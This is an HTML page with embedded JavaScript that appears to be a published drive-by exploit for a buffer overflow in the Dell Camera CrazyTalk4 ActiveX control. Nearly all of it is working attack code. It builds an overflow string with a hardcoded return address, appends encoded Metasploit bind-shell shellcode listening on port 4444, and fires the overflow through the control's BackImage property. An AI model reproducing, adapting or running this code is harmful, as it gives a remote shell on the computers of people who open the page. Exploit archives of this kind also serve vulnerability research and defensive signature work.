<!-- 
Dell Camera Software ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Exploit
bind shell, IE-NO-DEP

Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx
ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1
CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED}
Safe for Scripting (Registry): True
Safe for Initialization (Registry): True
-->
<!-- saved from url=(0014)about :internet -->
<html>
<object classid='clsid:13149882-F480-4F6B-8C6A-0764F75B99ED' id='obj' width=100; height=100; />
</object>
<script>
//bad chars:
//\x80,\x82-\x8c,\x8e,\x91-\x9c,\x9e-\x9f
var x=""; 
for (i=0; i<216; i++){x = x + "A";}
x = x + "\x50\x24\x40\x77";//0x77402450      jmp EBP, user32.dll - change for your need
for (i=0; i<140; i++){x = x + "A";}
// windows/shell_bind_tcp - 696 bytes
// http://www.metasploit.com
// Encoder: x86/alpha_mixed
// EXITFUNC=seh, LPORT=4444, RHOST=
x = x + "åÚÐÙuô^VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLCZJKPMM8KIKOKOKOE0LKBLFDQ4LKG5GLLKCLC5CHC1JOLKPOB8LKQOGPC1JKQYLKFTLKC1JNP1IPJ9NLMTIPCDEWIQIZDMC1IRJKL4GKPTQ4FHCEKULKQOGTEQJKBFLKDLPKLKQOELC1JKESFLLKK9BLGTELE1HCFQIKE4LKPCP0LKQPDLLKD0ELNMLKQPC8QNE8LNPNDNJLPPKOHVE6PSCVE8P3FRE8D7CCGBQOQDKON0E8HKJMKLGKPPKOIFQOLIJEE6K1JMC8C2QEBJERKOHPE8N9DIKENMF7KOHVPSF3QCQCF3QSF3QSF3KON0E6E8B1QLE6F3K9M1J5BHNDDZBPIWQGKOIFCZDPPQQEKOHPBHI4NMFNM9QGKOHVQCQEKOHPBHM5QYK6QYPWKON6F0PTF4QEKON0LSE8M7CIHFD9PWKON6F5KON0CVBJCTBFCXE3BMMYM5CZF0QIGYHLK9M7CZPDMYKRP1IPL3NJKNG2FMKNG2FLLSLMCJFXNKNKNKCXBRKNH3DVKOD5G4KOHVQKQGF2F1PQPQBJEQPQPQQEPQKON0BHNMIIC5HNQCKOIFCZKOKOP7KON0LKF7KLMSHDE4KON6PRKON0BHJPMZDDQOPSKON6KOHPAA";
try{
    obj.BackImage = x;
}catch(e){
}
</script>